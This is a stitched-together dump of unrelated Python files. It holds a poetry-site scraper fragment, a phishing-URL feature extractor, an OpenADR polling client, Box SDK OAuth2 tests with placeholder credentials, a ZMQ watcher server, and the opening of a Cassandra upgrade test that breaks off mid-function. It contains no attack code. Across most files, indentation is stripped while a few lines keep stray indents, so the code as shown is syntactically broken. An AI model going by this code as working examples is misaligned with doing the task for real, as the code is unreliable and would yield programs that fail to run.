dynasty = html.xpath('/html/body/div[4]/div[2]/div[1]/div[3]/div[1]/div[2]/a/text()')
if len(dynasty) == 0:
dynasty = '未知'
else:
dynasty = dynasty[0]
introduction = html.xpath('/html/body/div[4]/div[2]/div[1]/div[2]/div[1]/div[1]')[0].xpath(
'string(.)').strip()
with app.app_context():
poet = Poet(name=name, dynasty=dynasty, introduction=introduction)
db.session.add(poet)
db.session.commit()
id = poet.id
poem_num = html.xpath('/html/body/div[4]/div[2]/div[1]/div[3]/div[2]/div[2]/a/text()')[0][:-1]
poet_url_list = []
for i in range(1, int(int(poem_num) / 40) + 2):
                        poet_id = re.sub(r"\D", "", url)
poet_page_url = 'http://www.shicimingju.com/chaxun/zuozhe/{}_{}.html'.format(poet_id, i)
req1 = requests.get(url=poet_page_url, headers=get_header())
if req1.status_code == 200:
req1.encoding = 'utf-8'
list_html = etree.HTML(req1.text)
poet_url = list_html.xpath('//*/h3/a/@href')
poet_url_list += poet_url
poet_url_list = map(lambda x: self.base_url + x, poet_url_list)
for url in poet_url_list:
print(url)
req2 = requests.get(url, headers=get_header())
if req2.status_code == 200:
req2.encoding = 'utf-8'
poet_html = etree.HTML(req2.text)
title = poet_html.xpath('//*[@class="card"]/h1/text()')[0]
content = '\n'.join(poet_html.xpath('//*[@class="item_content"]/text()')).strip()
if not content:
content = '\n'.join(poet_html.xpath('//*[@class="para"]/text()')).strip()
if len(poet_html.xpath('//*[@class="shangxi_content"]')) == 0:
analysis = ''
else:
analysis = poet_html.xpath('//*[@class="shangxi_content"]')[0].xpath(
'string(.)').strip()
with app.app_context():
poem = Poem(title=title, content=content, analysis=analysis, author=id)
db.session.add(poem)
db.session.commit()
def run(self):
self.get_poet_url()
thread_list = []
for i in range(self.thread):
t = threading.Thread(target=self.Spider)
thread_list.append(t)
for t in thread_list:
                t.daemon = True
t.start()
for t in thread_list:
t.join()
self.Spider()
a = Shici()
a.run()
if __name__ == '__main__':
manager.run()
|
Helper.py
|
import threading
from utils.Checker import Checker
from tldextract import extract  # NOTE: `extract` was used below but never imported; tldextract is the assumed source
class Helper():
    @staticmethod
    def url_is_internal(url, compare):
        # True if `url` has the same registered domain as `compare`, or is a relative (non-http, non-fragment) link
if ".".join(extract(url)) == ".".join(extract(compare)) or (url[0:4] != "http" and url[0] != "#"):
return True
else:
return False
    @staticmethod
    def embed_url(url):
features_size = 30
threads = [None]*features_size
arr_threads_result = []
arr = []
try:
threads[0] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.having_IP_Address(arg1),0)), args=(url,))
threads[1] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.URL_Length(arg1),1)), args=(url,))
threads[2] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Shortining_Service(arg1),2)), args=(url,))
threads[3] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.having_At_Symbol(arg1),3)), args=(url,))
threads[4] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.double_slash_redirecting(arg1),4)), args=(url,))
threads[5] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Prefix_Suffix(arg1),5)), args=(url,))
threads[6] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.having_Sub_Domain(arg1),6)), args=(url,))
threads[7] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.SSLfinal_State(arg1),7)), args=(url,))
threads[8] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Domain_registeration_length(arg1),8)), args=(url,))
threads[9] = threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Favicon(arg1),9)), args=(url,))
threads[10]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.port(arg1),10)), args=(url,))
threads[11]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.HTTPS_token(arg1),11)), args=(url,))
threads[12]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Request_URL(arg1),12)), args=(url,))
threads[13]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.URL_of_Anchor(arg1),13)), args=(url,))
threads[14]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Links_in_tags(arg1),14)), args=(url,))
threads[15]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.SFH(arg1),15)), args=(url,))
threads[16]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Submitting_to_email(arg1),16)), args=(url,))
threads[17]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Abnormal_URL(arg1),17)), args=(url,))
threads[18]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Redirect(arg1),18)), args=(url,))
threads[19]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.on_mouseover (arg1),19)), args=(url,))
threads[20]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.RightClick (arg1),20)), args=(url,))
threads[21]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.popUpWidnow (arg1),21)), args=(url,))
threads[22]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Iframe(arg1),22)), args=(url,))
threads[23]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.age_of_domain(arg1),23)), args=(url,))
threads[24]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.DNSRecord(arg1),24)), args=(url,))
threads[25]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.web_traffic(arg1),25)), args=(url,))
threads[26]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Page_Rank(arg1),26)), args=(url,))
threads[27]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Google_Index(arg1),27)), args=(url,))
threads[28]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Links_pointing_to_page(arg1),28)), args=(url,))
threads[29]= threading.Thread(target=lambda arg1: arr_threads_result.append((Checker.Statistical_report(arg1),29)), args=(url,))
for i in range(features_size):
threads[i].start()
for i in range(features_size):
threads[i].join()
arr_threads_result.sort(key=lambda tup: tup[1])
for elem in arr_threads_result:
arr.append(elem[0])
return arr
except Exception as e:
return e
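# Hedged usage sketch (not part of the original module): how Helper.embed_url is expected to be called.
# It assumes the Checker.* feature functions each return a numeric score; the URL below is a placeholder.
#
#     features = Helper.embed_url("http://example.com/login")
#     if isinstance(features, Exception):
#         print("feature extraction failed:", features)    # embed_url returns the exception instead of raising
#     else:
#         print(len(features), "features:", features)       # 30 values, ordered by feature index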
|
poll.py
|
# pylint: disable=W1202, I1101
import threading
import urllib.error
import urllib.parse
import urllib.request
from random import uniform
import requests
from lxml import etree
from oadr2 import base, logger
# HTTP parameters:
REQUEST_TIMEOUT = 5 # HTTP request timeout
DEFAULT_VTN_POLL_INTERVAL = 300 # poll the VTN every X seconds
MINIMUM_POLL_INTERVAL = 10
POLLING_JITTER = 0.1 # polling interval +/-
OADR2_URI_PATH = 'OpenADR2/Simple/' # URI of where the VEN needs to request from
class OpenADR2(base.BaseHandler):
'''
poll.OpenADR2 is the class for sending requests and responses for OpenADR
2.0 events over HTTP.
Member Variables:
--------
(Everything from base.BaseHandler)
vtn_base_uri
vtn_poll_interval
ven_client_cert_key
ven_client_cert_pem
vtn_ca_certs
poll_thread
'''
def __init__(self, event_config, vtn_base_uri,
control_opts={},
username=None,
password=None,
ven_client_cert_key=None,
ven_client_cert_pem=None,
vtn_ca_certs=False,
vtn_poll_interval=DEFAULT_VTN_POLL_INTERVAL,
start_thread=True,
client_id=None,
):
'''
        Sets up the class and initializes the HTTP client.
        event_config -- A dictionary containing keyword arguments for the
                        EventHandler
ven_client_cert_key -- Certification Key for the HTTP Client
ven_client_cert_pem -- PEM file/string for the HTTP Client
vtn_base_uri -- Base URI of the VTN's location
vtn_poll_interval -- How often we should poll the VTN
vtn_ca_certs -- CA Certs for the VTN
        start_thread -- whether to start the poll-loop thread (kept as a legacy option)
'''
# Call the parent's methods
super(OpenADR2, self).__init__(event_config, control_opts, client_id=client_id)
# Get the VTN's base uri set
self.vtn_base_uri = vtn_base_uri
if self.vtn_base_uri: # append path
join_char = '/' if self.vtn_base_uri[-1] != '/' else ''
self.vtn_base_uri = join_char.join((self.vtn_base_uri, OADR2_URI_PATH))
try:
self.vtn_poll_interval = int(vtn_poll_interval)
assert self.vtn_poll_interval >= MINIMUM_POLL_INTERVAL
        except (ValueError, AssertionError):  # non-numeric value or below MINIMUM_POLL_INTERVAL
            logger.warning('Invalid poll interval: %s', vtn_poll_interval)
self.vtn_poll_interval = DEFAULT_VTN_POLL_INTERVAL
# Security & Authentication related
self.ven_certs = (ven_client_cert_pem, ven_client_cert_key)\
if ven_client_cert_pem and ven_client_cert_key else None
self.vtn_ca_certs = vtn_ca_certs
self.__username = username
self.__password = password
self.poll_thread = None
if start_thread: # this is left for backward compatibility
self.start()
logger.info("+++++++++++++++ OADR2 module started ++++++++++++++")
def start(self):
'''
        Start the polling thread if it is not already running.
'''
if self.poll_thread and self.poll_thread.is_alive():
logger.warning("Thread is already running")
return
self.poll_thread = threading.Thread(
name='oadr2.poll',
target=self.poll_vtn_loop)
self.poll_thread.daemon = True
self._exit.clear()
self.poll_thread.start()
logger.info("Polling thread started")
def stop(self):
'''
        Stops polling without stopping the event controller.
:return:
'''
        self._exit.set()  # signal the poll loop to exit before joining
        if self.poll_thread is not None:
            self.poll_thread.join(2)  # daemon thread, so don't block for long
logger.info("Polling thread stopped")
def exit(self):
'''
Shutdown the HTTP client, join the running threads and exit.
'''
if self.poll_thread is not None:
self.poll_thread.join(2) # they are daemons.
super(OpenADR2, self).exit()
def poll_vtn_loop(self):
'''
The threading loop which polls the VTN on an interval
'''
while not self._exit.is_set():
try:
self.query_vtn()
except urllib.error.HTTPError as ex: # 4xx or 5xx HTTP response:
logger.warning("HTTP error: %s\n%s", ex, ex.read())
except urllib.error.URLError as ex: # network error.
logger.debug("Network error: %s", ex)
except Exception as ex:
logger.exception("Error in OADR2 poll thread: %s", ex)
self._exit.wait(
uniform(
self.vtn_poll_interval*(1-POLLING_JITTER),
self.vtn_poll_interval*(1+POLLING_JITTER)
)
)
logger.info("+++++++++++++++ OADR2 polling thread has exited.")
def query_vtn(self):
'''
Query the VTN for an event.
'''
if not self.vtn_base_uri:
logger.warning("VTN base URI is invalid: %s", self.vtn_base_uri)
return
event_uri = self.vtn_base_uri + 'EiEvent'
payload = self.event_handler.build_request_payload()
logger.debug(
f'New polling request to {event_uri}:\n'
f'{etree.tostring(payload, pretty_print=True).decode("utf-8")}'
)
try:
resp = requests.post(
event_uri,
cert=self.ven_certs,
verify=self.vtn_ca_certs,
data=etree.tostring(payload),
auth=(self.__username, self.__password) if self.__username or self.__password else None
)
except Exception as ex:
logger.warning(f"Connection failed: {ex}")
return
reply = None
try:
payload = etree.fromstring(resp.content)
logger.debug(
f'Got Payload:\n'
f'{etree.tostring(payload, pretty_print=True).decode("utf-8")}'
)
reply = self.event_handler.handle_payload(payload)
except Exception as ex:
logger.warning(
f"Connection failed: error parsing payload\n"
f"{ex}: {resp.content}"
)
# If we have a generated reply:
if reply is not None:
logger.debug(
f'Reply to {event_uri}:\n'
f'{etree.tostring(reply, pretty_print=True).decode("utf-8")}'
)
# tell the control loop that events may have updated
# (note `self.event_controller` is defined in base.BaseHandler)
self.event_controller.events_updated()
self.send_reply(reply, event_uri) # And send the response
def send_reply(self, payload, uri):
'''
Send a reply back to the VTN.
payload -- An lxml.etree.ElementTree object containing an OpenADR 2.0
payload
uri -- The URI (of the VTN) where the response should be sent
'''
resp = requests.post(
uri,
cert=self.ven_certs,
verify=self.vtn_ca_certs,
data=etree.tostring(payload),
timeout=REQUEST_TIMEOUT,
auth=(self.__username, self.__password) if self.__username or self.__password else None
)
logger.debug("EiEvent response: %s", resp.status_code)
|
test_oauth2.py
|
# coding: utf-8
from __future__ import unicode_literals
from functools import partial
import re
from threading import Thread
import uuid
from mock import Mock, patch
import pytest
from six.moves import range # pylint:disable=redefined-builtin
# pylint:disable=import-error,no-name-in-module,wrong-import-order,relative-import
from six.moves.urllib import parse as urlparse
# pylint:enable=import-error,no-name-in-module,wrong-import-order,relative-import
from boxsdk.exception import BoxOAuthException
from boxsdk.network.default_network import DefaultNetworkResponse
from boxsdk.auth.oauth2 import OAuth2
from boxsdk.config import API
class MyError(Exception):
pass
class MyBaseException(BaseException):
pass
@pytest.fixture(params=('https://url.com/foo?bar=baz', 'https://ȕŕľ.com/ƒőő?Ƅȁŕ=Ƅȁż', None))
def redirect_url(request):
"""A value for the `redirect_uri` query string parameter for OAuth2."""
return request.param
def test_get_correct_authorization_url(redirect_url):
# pylint:disable=redefined-outer-name
fake_client_id = 'fake_client_id'
fake_client_secret = 'fake_client_secret'
oauth2 = OAuth2(
client_id=fake_client_id,
client_secret=fake_client_secret,
)
auth_url, csrf_token = oauth2.get_authorization_url(redirect_url=redirect_url)
expected_auth_url_format = '{0}?state={1}&response_type=code&client_id={2}'
if redirect_url:
expected_auth_url_format += '&redirect_uri={3}'
assert auth_url == expected_auth_url_format.format(
API.OAUTH2_AUTHORIZE_URL,
csrf_token,
fake_client_id,
urlparse.quote_plus((redirect_url or '').encode('utf-8')),
)
assert re.match('^box_csrf_token_[A-Za-z0-9]{16}$', csrf_token)
def test_authenticate_send_post_request_with_correct_params(mock_box_session, successful_token_response):
fake_client_id = 'fake_client_id'
fake_client_secret = 'fake_client_secret'
fake_auth_code = 'fake_auth_code'
data = {
'grant_type': 'authorization_code',
'code': fake_auth_code,
'client_id': fake_client_id,
'client_secret': fake_client_secret,
'box_device_id': '0',
'box_device_name': 'my_awesome_device',
}
mock_box_session.request.return_value = successful_token_response
oauth = OAuth2(
client_id=fake_client_id,
client_secret=fake_client_secret,
session=mock_box_session,
box_device_name='my_awesome_device',
)
oauth.authenticate(fake_auth_code)
mock_box_session.request.assert_called_once_with(
'POST',
'{0}/token'.format(API.OAUTH2_API_URL),
data=data,
headers={'content-type': 'application/x-www-form-urlencoded'},
access_token=None,
)
assert oauth.access_token == successful_token_response.json()['access_token']
@pytest.mark.parametrize('_', range(10))
def test_refresh_send_post_request_with_correct_params_and_handles_multiple_requests(
mock_box_session,
successful_token_response,
_,
):
fake_client_id = 'fake_client_id'
fake_client_secret = 'fake_client_secret'
fake_refresh_token = 'fake_refresh_token'
fake_access_token = 'fake_access_token'
data = {
'grant_type': 'refresh_token',
'refresh_token': fake_refresh_token,
'client_id': fake_client_id,
'client_secret': fake_client_secret,
'box_device_id': '0',
'box_device_name': 'my_awesome_device',
}
mock_box_session.request.return_value = successful_token_response
oauth = OAuth2(
client_id=fake_client_id,
client_secret=fake_client_secret,
access_token=fake_access_token,
refresh_token=fake_refresh_token,
session=mock_box_session,
box_device_name='my_awesome_device',
)
# Create four threads to call refresh on oauth at the same time.
threads = []
for _ in range(4):
threads.append(Thread(target=oauth.refresh, args=(fake_access_token,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
    # Assert that even though four threads tried to refresh the tokens at the same time, only one token request
    # was made, and that it was made with the correct params.
mock_box_session.request.assert_called_once_with(
'POST',
'{0}/token'.format(API.OAUTH2_API_URL),
data=data,
headers={'content-type': 'application/x-www-form-urlencoded'},
access_token=fake_access_token,
)
def test_authenticate_stores_tokens_correctly(mock_box_session, successful_token_response):
fake_client_id = 'fake_client_id'
fake_client_secret = 'fake_client_secret'
fake_auth_code = 'fake_auth_code'
mock_box_session.request.return_value = successful_token_response
mock_token_callback = Mock()
oauth = OAuth2(
client_id=fake_client_id,
client_secret=fake_client_secret,
session=mock_box_session,
store_tokens=mock_token_callback,
)
access_token, refresh_token = oauth.authenticate(fake_auth_code)
mock_token_callback.assert_called_once_with(access_token, refresh_token)
assert access_token == successful_token_response.json()['access_token']
assert refresh_token == successful_token_response.json()['refresh_token']
@pytest.mark.parametrize('_', range(10))
def test_refresh_gives_back_the_correct_response_and_handles_multiple_requests(
mock_box_session,
successful_token_response,
network_response_with_missing_tokens,
_,
):
# pylint:disable=redefined-outer-name
fake_client_id = 'fake_client_id'
fake_client_secret = 'fake_client_secret'
fake_refresh_token = 'fake_refresh_token'
fake_access_token = 'fake_access_token'
    # Set up the network layer so that if oauth makes more than one request, it will get a malformed response and
    # fail the test.
mock_box_session.request.side_effect = [successful_token_response, network_response_with_missing_tokens]
oauth = OAuth2(
client_id=fake_client_id,
client_secret=fake_client_secret,
access_token=fake_access_token,
refresh_token=fake_refresh_token,
session=mock_box_session,
)
def refresh_tokens_and_verify_the_response():
access_token, refresh_token = oauth.refresh(fake_access_token)
assert access_token == successful_token_response.json()['access_token']
assert refresh_token == successful_token_response.json()['refresh_token']
    # Create four threads and refresh the token at the same time. Assert that they all get the same new access token
    # and refresh token.
threads = []
for _ in range(4):
threads.append(Thread(target=refresh_tokens_and_verify_the_response))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
@pytest.fixture()
def token_method(request):
""" Fixture that returns a partial method based on the method provided in request.param"""
if request.param == OAuth2.refresh:
return partial(OAuth2.refresh, access_token_to_refresh='fake_access_token')
elif request.param == OAuth2.authenticate:
return partial(OAuth2.authenticate, auth_code='fake_code')
return None
@pytest.mark.parametrize(
'token_method',
[OAuth2.refresh, OAuth2.authenticate],
indirect=True,
)
def test_token_request_raises_box_oauth_exception_when_getting_bad_network_response(
token_method,
mock_box_session,
bad_network_response,
):
with pytest.raises(BoxOAuthException):
mock_box_session.request.return_value = bad_network_response
oauth = OAuth2(
client_id='',
client_secret='',
access_token='fake_access_token',
session=mock_box_session,
)
token_method(oauth)
@pytest.mark.parametrize(
'token_method',
[OAuth2.refresh, OAuth2.authenticate],
indirect=True,
)
def test_token_request_raises_box_oauth_exception_when_no_json_object_can_be_decoded(
token_method,
mock_box_session,
non_json_response,
):
mock_box_session.request.return_value = non_json_response
oauth = OAuth2(
client_id='',
client_secret='',
access_token='fake_access_token',
session=mock_box_session,
)
with pytest.raises(BoxOAuthException):
token_method(oauth)
@pytest.fixture(params=[
['access_token'],
['refresh_token'],
[],
])
def network_response_with_missing_tokens(request):
mock_network_response = Mock(DefaultNetworkResponse)
mock_network_response.ok = True
json_dict = {}
for key in request.param:
json_dict[key] = 'fake_token'
mock_network_response.json.return_value = json_dict
return mock_network_response
@pytest.mark.parametrize('test_method', [
partial(OAuth2.refresh, access_token_to_refresh='fake_access_token'),
partial(OAuth2.authenticate, auth_code='fake_code')
])
def test_token_request_raises_box_oauth_exception_when_tokens_are_not_in_the_response(
test_method,
mock_box_session,
network_response_with_missing_tokens,
):
# pylint:disable=redefined-outer-name
mock_box_session.request.return_value = network_response_with_missing_tokens
oauth = OAuth2(
client_id='',
client_secret='',
access_token='fake_access_token',
session=mock_box_session,
)
with pytest.raises(BoxOAuthException):
test_method(oauth)
def test_token_request_allows_missing_refresh_token(mock_box_session):
mock_network_response = Mock()
mock_network_response.ok = True
mock_network_response.json.return_value = {'access_token': 'fake_token'}
mock_box_session.request.return_value = mock_network_response
oauth = OAuth2(
client_id='',
client_secret='',
access_token='fake_access_token',
session=mock_box_session,
)
oauth.send_token_request({}, access_token=None, expect_refresh_token=False)
@pytest.fixture()
def oauth(client_id, client_secret, access_token, refresh_token, mock_box_session):
return OAuth2(
client_id=client_id,
client_secret=client_secret,
access_token=access_token,
refresh_token=refresh_token,
session=mock_box_session,
)
@pytest.mark.parametrize(
'access_token,refresh_token,expected_token_to_revoke',
(
('fake_access_token', 'fake_refresh_token', 'fake_access_token'),
(None, 'fake_refresh_token', 'fake_refresh_token')
)
)
def test_revoke_sends_revoke_request(
client_id,
client_secret,
mock_box_session,
access_token,
oauth,
expected_token_to_revoke,
):
mock_network_response = Mock()
mock_network_response.ok = True
mock_box_session.request.return_value = mock_network_response
oauth.revoke()
mock_box_session.request.assert_called_once_with(
'POST',
'{0}/revoke'.format(API.OAUTH2_API_URL),
data={
'client_id': client_id,
'client_secret': client_secret,
'token': expected_token_to_revoke,
},
access_token=access_token,
)
assert oauth.access_token is None
def test_tokens_get_updated_after_noop_refresh(client_id, client_secret, access_token, new_access_token, refresh_token, mock_box_session):
"""`OAuth2` object should update its state with new tokens, after no-op refresh.
If the protected method `_get_tokens()` returns new tokens, refresh is
skipped, and those tokens are used.
This is a regression test for issue #128 [1]. We would return the new
tokens without updating the object state. Subsequent uses of the `OAuth2`
object would use the old tokens.
[1] <https://github.com/box/box-python-sdk/issues/128>
"""
new_refresh_token = uuid.uuid4().hex
new_tokens = (new_access_token, new_refresh_token)
class GetTokensOAuth2(OAuth2):
def _get_tokens(self):
"""Return a new set of tokens, without updating any state.
In order for the test to pass, the `OAuth2` object must be
correctly programmed to take this return value and use it to update
its state.
"""
return new_tokens
oauth = GetTokensOAuth2(
client_id=client_id,
client_secret=client_secret,
access_token=access_token,
refresh_token=refresh_token,
session=mock_box_session,
)
assert oauth.access_token == access_token
assert oauth.refresh(access_token) == new_tokens
assert oauth.access_token == new_access_token
def test_closed_is_false_after_init(client_id, client_secret, mock_box_session):
auth = OAuth2(client_id=client_id, client_secret=client_secret, session=mock_box_session)
assert auth.closed is False
def test_closed_is_true_after_close(client_id, client_secret, mock_box_session):
auth = OAuth2(client_id=client_id, client_secret=client_secret, session=mock_box_session)
auth.close()
assert auth.closed is True
def test_token_requests_fail_after_close(client_id, client_secret, mock_box_session):
auth = OAuth2(client_id=client_id, client_secret=client_secret, session=mock_box_session)
auth.close()
with pytest.raises(ValueError):
auth.refresh(auth.access_token)
@pytest.mark.parametrize('raise_exception', [False, True])
def test_context_manager_closes_auth_object(client_id, client_secret, mock_box_session, raise_exception):
auth = OAuth2(client_id=client_id, client_secret=client_secret, session=mock_box_session)
try:
with auth.closing():
if raise_exception:
raise MyError
except MyError:
pass
assert auth.closed is True
def test_context_manager_fails_after_close(client_id, client_secret, mock_box_session):
auth = OAuth2(client_id=client_id, client_secret=client_secret, session=mock_box_session)
with auth.closing():
pass
with pytest.raises(ValueError):
with auth.closing():
assert False
@pytest.mark.parametrize(('close_args', 'close_kwargs'), [((), {}), ((True,), {}), ((), dict(revoke=True))])
def test_revoke_on_close(client_id, client_secret, access_token, mock_box_session, close_args, close_kwargs):
auth = OAuth2(client_id=client_id, client_secret=client_secret, access_token=access_token, session=mock_box_session)
with patch.object(auth, 'revoke') as mock_revoke:
auth.close(*close_args, **close_kwargs)
mock_revoke.assert_called_once_with()
def test_auth_object_is_closed_even_if_revoke_fails(client_id, client_secret, access_token, mock_box_session):
auth = OAuth2(client_id=client_id, client_secret=client_secret, access_token=access_token, session=mock_box_session)
with patch.object(auth, 'revoke', side_effect=BoxOAuthException(status=500)):
with pytest.raises(BoxOAuthException):
auth.close(revoke=True)
assert auth.closed is True
@pytest.mark.parametrize(('close_args', 'close_kwargs'), [((False,), {}), ((), dict(revoke=False))])
def test_revoke_on_close_can_be_skipped(client_id, client_secret, access_token, mock_box_session, close_args, close_kwargs):
auth = OAuth2(client_id=client_id, client_secret=client_secret, access_token=access_token, session=mock_box_session)
with patch.object(auth, 'revoke') as mock_revoke:
auth.close(*close_args, **close_kwargs)
mock_revoke.assert_not_called()
@pytest.mark.parametrize(('raise_from_block', 'raise_from_close', 'expected_exception'), [
(MyError, None, MyError),
(None, BoxOAuthException(status=500), BoxOAuthException),
(MyError, BoxOAuthException(status=500), MyError),
])
@pytest.mark.parametrize('close_kwargs', [{}, dict(revoke=False), dict(revoke=True)])
def test_context_manager_reraises_first_exception_after_close(
client_id, client_secret, mock_box_session, close_kwargs, raise_from_block, raise_from_close, expected_exception,
):
auth = OAuth2(client_id=client_id, client_secret=client_secret, session=mock_box_session)
with patch.object(auth, 'close', side_effect=raise_from_close) as mock_close:
with pytest.raises(expected_exception):
with auth.closing(**close_kwargs):
if raise_from_block:
raise raise_from_block
mock_close.assert_called_once_with(**close_kwargs)
@pytest.mark.parametrize('close_kwargs', [{}, dict(revoke=False), dict(revoke=True)])
def test_context_manager_skips_revoke_on_base_exception(client_id, client_secret, mock_box_session, close_kwargs):
auth = OAuth2(client_id=client_id, client_secret=client_secret, session=mock_box_session)
with patch.object(auth, 'close') as mock_close:
with pytest.raises(MyBaseException):
with auth.closing(**close_kwargs):
raise MyBaseException
mock_close.assert_called_once_with(revoke=False)
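# Sketch of the usage pattern the tests above exercise (illustrative only; the credential values are
# placeholders and the Client wiring is assumed rather than shown):
# auth = OAuth2(client_id=client_id, client_secret=client_secret, access_token=access_token)
# with auth.closing(revoke=True):      # pass revoke=False to keep the token valid after the block
#     ...                              # use `auth` here (e.g. hand it to a Client)
# # On exit the auth object is closed even if the block raised, and the block's exception, if any,
# # takes precedence over an exception raised during close/revoke.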
|
watcher.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import uuid
from typing import Sequence
from .zmq_wrapper import ZmqWrapper
from .watcher_base import WatcherBase
from .lv_types import CliSrvReqTypes
from .lv_types import DefaultPorts, PublisherTopics, ServerMgmtMsg
from . import utils
import threading, time
class Watcher(WatcherBase):
def __init__(self, filename:str=None, port:int=0, srv_name:str=None):
super(Watcher, self).__init__()
self.port = port
self.filename = filename
# used to detect server restarts
self.srv_name = srv_name or str(uuid.uuid4())
# define vars in __init__
self._clisrv = None
self._zmq_stream_pub = None
self._file = None
self._th = None
self._open_devices()
def _open_devices(self):
if self.port is not None:
self._clisrv = ZmqWrapper.ClientServer(port=DefaultPorts.CliSrv+self.port,
is_server=True, callback=self._clisrv_callback)
# notify existing listeners of our ID
self._zmq_stream_pub = self._stream_factory.get_streams(stream_types=['tcp:'+str(self.port)], for_write=True)[0]
# ZMQ quirk: we must wait a bit after opening port and before sending message
# TODO: can we do better?
self._th = threading.Thread(target=self._send_server_start)
self._th.start()
def _send_server_start(self):
time.sleep(2)
self._zmq_stream_pub.write(ServerMgmtMsg(event_name=ServerMgmtMsg.EventServerStart,
event_args=self.srv_name), topic=PublisherTopics.ServerMgmt)
    def devices_or_default(self, devices:Sequence[str])->Sequence[str]: # overridden
# TODO: this method is duplicated in Watcher and WatcherClient
# make sure TCP port is attached to tcp device
if devices is not None:
return ['tcp:' + str(self.port) if device=='tcp' else device for device in devices]
# if no devices specified then use our filename and tcp:port as default devices
devices = []
# first open file device because it may have older data
if self.filename is not None:
devices.append('file:' + self.filename)
if self.port is not None:
devices.append('tcp:' + str(self.port))
return devices
def close(self):
if not self.closed:
if self._clisrv is not None:
self._clisrv.close()
if self._zmq_stream_pub is not None:
self._zmq_stream_pub.close()
if self._file is not None:
self._file.close()
utils.debug_log("Watcher is closed", verbosity=1)
super(Watcher, self).close()
def _reset(self):
self._clisrv = None
self._zmq_stream_pub = None
self._file = None
self._th = None
utils.debug_log("Watcher reset", verbosity=1)
super(Watcher, self)._reset()
def _clisrv_callback(self, clisrv, clisrv_req): # pylint: disable=unused-argument
utils.debug_log("Received client request", clisrv_req.req_type)
# request = create stream
if clisrv_req.req_type == CliSrvReqTypes.create_stream:
stream_req = clisrv_req.req_data
self.create_stream(name=stream_req.stream_name, devices=stream_req.devices,
event_name=stream_req.event_name, expr=stream_req.expr, throttle=stream_req.throttle,
vis_args=stream_req.vis_args)
return None # ignore return as we can't send back stream obj
elif clisrv_req.req_type == CliSrvReqTypes.del_stream:
stream_name = clisrv_req.req_data
return self.del_stream(stream_name)
else:
            raise ValueError('ClientServer Request Type {} is not recognized'.format(clisrv_req.req_type))
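# Illustrative usage sketch (assumes WatcherBase.create_stream accepts the keyword arguments used in
# _clisrv_callback above; the filename and stream name are hypothetical):
# w = Watcher(filename="run.log", port=0)              # serves requests on DefaultPorts.CliSrv + 0
# stream = w.create_stream(name="loss", devices=None)  # devices default to ['file:run.log', 'tcp:0']
# ...                                                  # write values to the stream from the training loop
# w.close()                                            # closes the client-server channel, publisher and file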
|
upgrade_through_versions_test.py
|
import operator
import os
import pprint
import random
import signal
import time
import uuid
import logging
import pytest
import psutil
from collections import defaultdict, namedtuple
from multiprocessing import Process, Queue
from queue import Empty, Full
from cassandra import ConsistencyLevel, WriteTimeout
from cassandra.query import SimpleStatement
from dtest import RUN_STATIC_UPGRADE_MATRIX, Tester
from tools.misc import generate_ssl_stores, new_node
from .upgrade_base import switch_jdks
from .upgrade_manifest import (build_upgrade_pairs,
current_2_1_x, current_2_2_x, current_3_0_x,
indev_3_11_x,
current_3_11_x, indev_trunk)
logger = logging.getLogger(__name__)
def data_writer(tester, to_verify_queue, verification_done_queue, rewrite_probability=0):
"""
Process for writing/rewriting data continuously.
Pushes to a queue to be consumed by data_checker.
Pulls from a queue of already-verified rows written by data_checker that it can overwrite.
Intended to be run using multiprocessing.
"""
# 'tester' is a cloned object so we shouldn't be inappropriately sharing anything with another process
session = tester.patient_cql_connection(tester.node1, keyspace="upgrade", protocol_version=tester.protocol_version)
prepared = session.prepare("UPDATE cf SET v=? WHERE k=?")
prepared.consistency_level = ConsistencyLevel.QUORUM
def handle_sigterm(signum, frame):
# need to close queue gracefully if possible, or the data_checker process
# can't seem to empty the queue and test failures result.
to_verify_queue.close()
exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
while True:
try:
key = None
if (rewrite_probability > 0) and (random.randint(0, 100) <= rewrite_probability):
try:
key = verification_done_queue.get_nowait()
except Empty:
# we wanted a re-write but the re-writable queue was empty. oh well.
pass
key = key or uuid.uuid4()
val = uuid.uuid4()
session.execute(prepared, (val, key))
to_verify_queue.put((key, val,))
except Exception:
logger.debug("Error in data writer process!")
to_verify_queue.close()
raise
def data_checker(tester, to_verify_queue, verification_done_queue):
"""
Process for checking data continuously.
Pulls from a queue written to by data_writer to know what to verify.
Pushes to a queue to tell data_writer what's been verified and could be a candidate for re-writing.
Intended to be run using multiprocessing.
"""
# 'tester' is a cloned object so we shouldn't be inappropriately sharing anything with another process
session = tester.patient_cql_connection(tester.node1, keyspace="upgrade", protocol_version=tester.protocol_version)
prepared = session.prepare("SELECT v FROM cf WHERE k=?")
